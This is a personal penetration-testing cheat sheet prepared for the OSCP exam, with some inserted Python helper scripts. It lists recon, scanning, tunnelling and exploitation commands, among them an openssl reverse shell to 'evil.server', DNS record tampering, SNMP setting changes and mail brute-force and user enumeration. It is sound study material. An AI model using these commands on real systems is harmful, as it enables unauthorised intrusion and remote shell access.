Last changed: 08.07.2020
Network pentesting
I started this command list for my Offensive Security Certified Professional exam. It summarizes some means to collect data and exploit vulnerabilities in a target network.
open source information
Search engines and public databases can be helpful to find additional information about the target network as well as email addresses of employees.
target information
whois <domain>
whois <target_ip>
geoiplookup <target_ip>
search engine research
www.exploit-db.com/google-dorks/
theharvester -d target.com -p all -l 200
bing ip search
ip:<target_ip>
dns lookup
dig target.com
dig -t aaaa target.com
dig -t axfr target.com @ns.target.com
fierce -dns target.com
dnsenum -f <dictfile> <domain>
dynamic dns update
nsupdate
> server 10.0.0.1
> local 127.0.0.100
> update delete server.target.com. A
> update add server.target.com. 86400 A 127.0.0.1
> send
autonomous system information
Information about autonomous systems can be found with whois, on http://ftp.arin.net/info/asn.txt or with https://www.ultratools.com/tools/asnInfo
whois <asn>
public ip address
whereami from my netstuff repository shows some information about your current public ip address
whereami
passive network sniffing
If you are inside the network and want to avoid detection, passive sniffing will supply information about network clients without any interaction. Make sure that your machine is not requesting an IP via DHCP or sending IPv6 router/neighbor solicitations.
preparation
systemctl stop NetworkManager
killall dhclient
sysctl -w net.ipv6.conf.all.autoconf=0
sysctl -w net.ipv6.conf.all.accept_ra=0
dump traffic
tcpdump -i eth0 -X -s 262144 -w dump.pcap
monitor dns requests
passivedns -i eth0 -l /dev/stdout
passive os fingerprinting
p0f -i eth0 -o outfile
traffic analysis
To analyze the TCP streams in a pcap you can use tshark: the first command lists the conversations sorted by start time and numbered so that the index matches the stream number, the second follows a single stream by that index.
tshark -r dump.pcap -z conv,tcp -q | sed '1,5d;$d' | awk '{print $10 " " $1 " " $2 " " $3}' | sort -g | awk '{print NR-1,$0}'
tshark -r dump.pcap -z follow,tcp,ascii,0 -q
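As an added example (not from the page or the author's netstuff repository), the following pure-Python script reproduces what the tshark pipeline above does: it walks a pcap, groups TCP packets into conversations and numbers them in order of first appearance, which is the order tshark uses for tcp.stream. The sample capture is constructed inline; its frames carry zero checksums, which the parser does not validate.

```python
import struct

def build_pcap(frames):
    """Wrap raw Ethernet frames in a minimal little-endian pcap file (link type 1)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for ts, frame in frames:
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out

def tcp_frame(src, dst, sport, dport, payload=b""):
    """Constructed Ethernet/IPv4/TCP frame; checksums stay zero (the parser ignores them)."""
    eth = b"\x00" * 12 + b"\x08\x00"                      # dst/src MAC, ethertype IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload

def tcp_conversations(pcap):
    """List TCP conversations as (index, initiator, responder, frames, bytes).
    The index counts conversations in order of first appearance, the same order
    tshark assigns tcp.stream, so it can be handed to -z follow,tcp,ascii,N."""
    convs = {}                    # unordered endpoint pair -> stats; dicts keep insertion order
    off = 24                      # skip the pcap global header
    while off + 16 <= len(pcap):
        _, _, incl, _ = struct.unpack_from("<IIII", pcap, off)
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 38 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue              # too short, not IPv4, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        sport, dport = struct.unpack_from("!HH", frame, 14 + ihl)
        key = frozenset([(src, sport), (dst, dport)])
        if key not in convs:
            convs[key] = [(src, sport), (dst, dport), 0, 0]
        convs[key][2] += 1
        convs[key][3] += len(frame)
    return [(i, f"{a}:{pa}", f"{b}:{pb}", n, size)
            for i, ((a, pa), (b, pb), n, size) in enumerate(convs.values())]

# Constructed sample capture: an HTTP conversation interleaved with an SMTP one.
SAMPLE_PCAP = build_pcap([
    (1, tcp_frame("192.168.11.5", "192.168.11.2", 40000, 80, b"GET / HTTP/1.0\r\n\r\n")),
    (2, tcp_frame("192.168.11.5", "192.168.11.2", 40001, 25)),
    (2, tcp_frame("192.168.11.2", "192.168.11.5", 25, 40001, b"220 mail ready\r\n")),
    (3, tcp_frame("192.168.11.2", "192.168.11.5", 80, 40000, b"HTTP/1.0 200 OK\r\n\r\n")),
])

if __name__ == "__main__":
    for row in tcp_conversations(SAMPLE_PCAP):
        print(*row)
```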
network scanning
dynamic host configuration protocol
In my netstuff repository I have a small script using scapy to send a single DHCP packet. This way some network information can be retrieved.
dhcp_discover eth0
address resolution protocol
With scapy you can easily send ARP and RARP requests.
srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=TARGET_IP,psrc='0.0.0.0'))[0].show()
srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(psrc='0.0.0.0',op=3,hwdst=TARGET_MAC))[0].show()
host discovery
nmap -sn 192.168.11.0/24
nmap 192.168.11.0/24 -p 139 -oG grepable_output.txt
unicornscan 192.168.11.0/24:139
ping -I eth0 ff02::1
ping -I eth0 ff02::2
portscan
nmap -sS 192.168.11.2 -p1-65535
nmap -sU 192.168.11.2 -p1-65535
proxychains nmap -n -Pn -sT 192.168.11.2 -p445,3389,5985
os detection
nmap -O -sV 192.168.11.2
finding transparent proxies
nmap -Pn <some_extern_host> --ttl 2 -T5
transport layer security
You can retrieve the TLS certificate with openssl. In case the server requires Server Name Indication (SNI) you will have to use -servername.
openssl s_client -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -fingerprint
openssl s_client -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -text
openssl s_client -connect <target>:<port> -servername target.com </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -text
openssl s_client -showcerts -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -outform PEM > cert.pem
simple network management protocol
SNMP can be exploited for information gathering and, if you are lucky, to change settings on the host. The community strings of SNMPv1 and SNMPv2c get transmitted in clear text.
guess community string
nmap -Pn -sU <target> -p 161 --script=snmp-brute
onesixtyone -c <dictfile> -i <ip_list>
information gathering
To translate the OIDs into textual form the package snmp-mibs-downloader might be needed.
snmpwalk -c public -v 2c -m ALL <target> 1
snmp-check -c public -v 2c <target>
nmap -Pn -sU <target> -p 161 --script=snmp-interfaces.nse
nmap -Pn -sU <target> -p 161 --script=snmp-processes.nse
nmap -Pn -sU <target> -p 161 --script=snmp-netstat.nse
change settings
snmpset -mALL -v1 -c secret <target> sysName.0 s hacked.host
snmpget -mALL -v1 -c secret <target> sysName.0
file transfer protocol
curl ftp://user:password@server.com
curl ftp://user:password@server.com/file.txt -o file.txt
curl ftp://user:password@server.com -Q '-DELE file.txt'
preboot execution environment
In a preboot execution environment (PXE) the hosts download and boot their operating system from a server in the network. These files can be downloaded manually to examine their content. The needed locations can be found in the DHCP packets.
download pxe binary
tftp <next-server-ip-address>
get <boot-file-name>
extract config file name
strings <boot-file-name> | grep -i tftp -A1
tftp <next-server-ip-address>
get <config file>/default
download kernel and initrd
tftp <next-server-ip-address>
get <vmlinuz-file-from-config>
get <initrd-file-from-config>
mount network block device
modprobe nbd
nbd-client <target> -N /device/name /dev/nbd0 -persist
mount /dev/nbd0 /mnt/nbd
universal plug and play
discover services
echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:rootdevice\r\n\r\n' | nc -uw 1 <target> 1900
echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:all\r\n\r\n' | nc -uw 1 <target> 1900
get service control point definition
curl http://192.168.0.1:49000/igddesc.xml
simple object access protocol example
POST /igdupnp/control/WANIPConn1 HTTP/1.1
Accept-Encoding: identity
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
Host: 192.168.0.1:49000
Connection: close
Content-Type: text/xml
Content-Length: <length of the body in bytes>

<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetExternalIPAddress xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
</u:GetExternalIPAddress>
</s:Body>
</s:Envelope>
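As an added example (not from the page), this Python script builds the SOAP call shown above with a Content-Length computed from the body actually sent, and parses the gateway's reply; it is useful for checking from inside the LAN whether a gateway answers WANIPConnection calls at all. The control path and port come from the page; the reply is a constructed sample, and call_igd is the only part that needs network access.

```python
import re
import socket

def build_soap_request(host, port, path, service, action, args=None):
    """Build a UPnP SOAP call; Content-Length is computed from the body actually sent."""
    arg_xml = "".join(f"<{k}>{v}</{k}>" for k, v in (args or {}).items())
    body = (
        '<?xml version="1.0"?>\r\n'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">\r\n'
        f'<s:Body><u:{action} xmlns:u="{service}">{arg_xml}</u:{action}></s:Body>\r\n'
        '</s:Envelope>\r\n'
    ).encode()
    headers = (
        f'POST {path} HTTP/1.1\r\n'
        f'Host: {host}:{port}\r\n'
        f'SOAPAction: "{service}#{action}"\r\n'
        'Content-Type: text/xml; charset="utf-8"\r\n'
        f'Content-Length: {len(body)}\r\n'
        'Connection: close\r\n\r\n'
    ).encode()
    return headers + body

def parse_soap_response(raw):
    """Return (HTTP status, {argument: value}) from a raw SOAP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status = int(head.split(b" ", 2)[1])
    # The unprefixed child elements carry the out-arguments, e.g. NewExternalIPAddress.
    values = dict(re.findall(r"<(\w+)>([^<]*)</\1>", body.decode(errors="replace")))
    return status, values

def call_igd(host, port, path, service, action, args=None, timeout=5):
    """Send the call to the gateway and parse the reply (needs network access)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_soap_request(host, port, path, service, action, args))
        raw = b"".join(iter(lambda: sock.recv(4096), b""))
    return parse_soap_response(raw)

WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"

# Constructed reply in the shape a gateway returns for GetExternalIPAddress.
SAMPLE_RESPONSE = (
    b'HTTP/1.1 200 OK\r\nContent-Type: text/xml; charset="utf-8"\r\n\r\n'
    b'<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<s:Body><u:GetExternalIPAddressResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
    b'<NewExternalIPAddress>203.0.113.7</NewExternalIPAddress>'
    b'</u:GetExternalIPAddressResponse></s:Body></s:Envelope>'
)

if __name__ == "__main__":
    print(parse_soap_response(SAMPLE_RESPONSE))
```

Against a real gateway, call_igd("192.168.0.1", 49000, "/igdupnp/control/WANIPConn1", WANIP, "GetExternalIPAddress") performs the call from the page.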
simple mail transfer protocol
find mail server
dig -t mx <target>
get own domain name
dig -x `curl -s ifconfig.co` | grep -A1 "ANSWER SECTION"
spoofing protection
To check SPF and DMARC settings, spoofcheck can be used.
python2 spoofcheck.py target.com
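As an added example (not from the page and not spoofcheck's code), the following Python functions evaluate an SPF and a DMARC TXT record for the weaknesses such a check looks for: a permissive or missing 'all' mechanism, too many DNS-querying terms, a DMARC policy of none, a partial pct and missing report addresses. The records below are constructed samples; no DNS query is made.

```python
import re

LOOKUP_TERM = re.compile(r"^[+\-~?]?(include:|a\b|mx\b|ptr|exists:)|^redirect=")

def check_spf(record):
    """Return findings for an SPF TXT record; an empty list means nothing weak was found."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["no valid SPF record: receivers cannot verify the sending hosts"]
    findings = []
    mechs = [t.lower() for t in terms[1:] if "=" not in t]  # modifiers (k=v) are not mechanisms
    last = mechs[-1] if mechs else ""
    if last.endswith("all"):
        qualifier = last[:-3] or "+"
        if qualifier == "+":
            findings.append("'+all' authorizes every host on the internet to send")
        elif qualifier in ("~", "?"):
            findings.append(f"'{qualifier}all' does not reject forged mail (softfail/neutral)")
    elif not any(t.lower().startswith("redirect=") for t in terms):
        findings.append("no 'all' mechanism: unlisted senders are treated as neutral")
    lookups = sum(1 for t in terms if LOOKUP_TERM.match(t.lower()))
    if lookups > 10:
        findings.append(f"{lookups} DNS-querying terms exceed the limit of 10 (permerror)")
    return findings

def check_dmarc(record):
    """Return findings for a _dmarc.<domain> TXT record."""
    if not record:
        return ["no DMARC record: SPF and DKIM results are not enforced"]
    tags = {k.strip(): v.strip() for k, v in (p.split("=", 1) for p in record.split(";") if "=" in p)}
    if tags.get("v") != "DMARC1":
        return ["malformed DMARC record"]
    findings = []
    if tags.get("p", "none") == "none":
        findings.append("p=none: spoofed mail is only reported, not rejected")
    if tags.get("pct", "100") != "100":
        findings.append(f"pct={tags['pct']}: policy is applied to only part of the mail")
    if not (tags.get("rua") or tags.get("ruf")):
        findings.append("no rua/ruf: nobody receives the DMARC reports")
    return findings

# Constructed sample records for two made-up domains.
SAMPLES = {
    "weak.example": ("v=spf1 include:_spf.example.net ~all", "v=DMARC1; p=none; rua=mailto:dmarc@weak.example"),
    "strict.example": ("v=spf1 mx ip4:192.0.2.0/24 -all", "v=DMARC1; p=reject; rua=mailto:dmarc@strict.example"),
}
if __name__ == "__main__":
    for domain, (spf, dmarc) in SAMPLES.items():
        print(domain, check_spf(spf) + check_dmarc(dmarc))
```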
manual tls connect
openssl s_client -connect <target>:<port> -ign_eof
HELO my.domain.name
MAIL FROM: <nobody@tempmail.de>
RCPT TO: <admin@shitmail.de>
DATA
Subject: foobar

Hello,
Bye.
.
QUIT
nmap scanning scripts
nmap -Pn --script smtp-commands <target> -p <port>
nmap -Pn --script smtp-open-relay <target> -p <port>
nmap -Pn --script smtp-enum-users <target> -p <port> --script-args 'methods={EXPN}'
nmap -Pn --script smtp-enum-users <target> -p <port> --script-args 'methods={VRFY}'
nmap -Pn --script smtp-enum-users <target> -p <port> --script-args 'methods={RCPT}'
nmap -Pn --script smtp-brute <target> -p <port>
enumerate users
smtp-user-enum -M RCPT -U <userlist> -D <target.domain> -t <host>
post office protocol (POP3) and internet message access protocol (IMAP)
nmap scanning scripts
nmap -Pn --script pop3-capabilities <target> -p <port>
nmap -Pn --script pop3-brute <target> -p <port>
nmap -Pn --script imap-capabilities <target> -p <port>
nmap -Pn --script imap-brute <target> -p <port>
netbios discovery
nbtscan -r 192.168.11.0/24
nmap 192.168.11.2 --script smb-enum-users.nse
nmap 192.168.11.2 --script smb-check-vulns.nse
rpcclient -U "" 192.168.11.2
tunneling
clear to ssl forwarding
socat TCP4-LISTEN:25,fork,reuseaddr OPENSSL:target.com:465,verify=0
IPv4 to IPv6 forwarding
socat TCP4-LISTEN:25,fork,reuseaddr TCP6:target.com:25
local tunnel (opens 31337 on client)
ssh -g -L 31337:target:445 user@ssh-server
plink.exe -g -L 31337:target:445 -l user -pw password ssh-server
remote tunnel (opens 31337 on server)
ssh -R 31337:target:445 user@ssh-server
plink.exe -R 31337:target:445 -l user -pw password ssh-server
To allow connections from other hosts you have to enable GatewayPorts yes in /etc/ssh/sshd_config on the server.
socks proxy
ssh -D 9050 user@ssh-server
vim /etc/proxychains.conf
proxychains nmap -Pn target -p 22
Be aware that UDP will bypass proxychains.
openssl backconnect shell
start server
openssl req -x509 -nodes -sha256 -subj "/CN=evil.server" -newkey rsa:2048 -keyout evil.pem -out evil.pem
openssl s_server -cert evil.pem
start client
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect evil.server:4433 > /tmp/s; rm /tmp/s
Other reverse shell commands can be found at pentestmonkey.net and highon.coffee.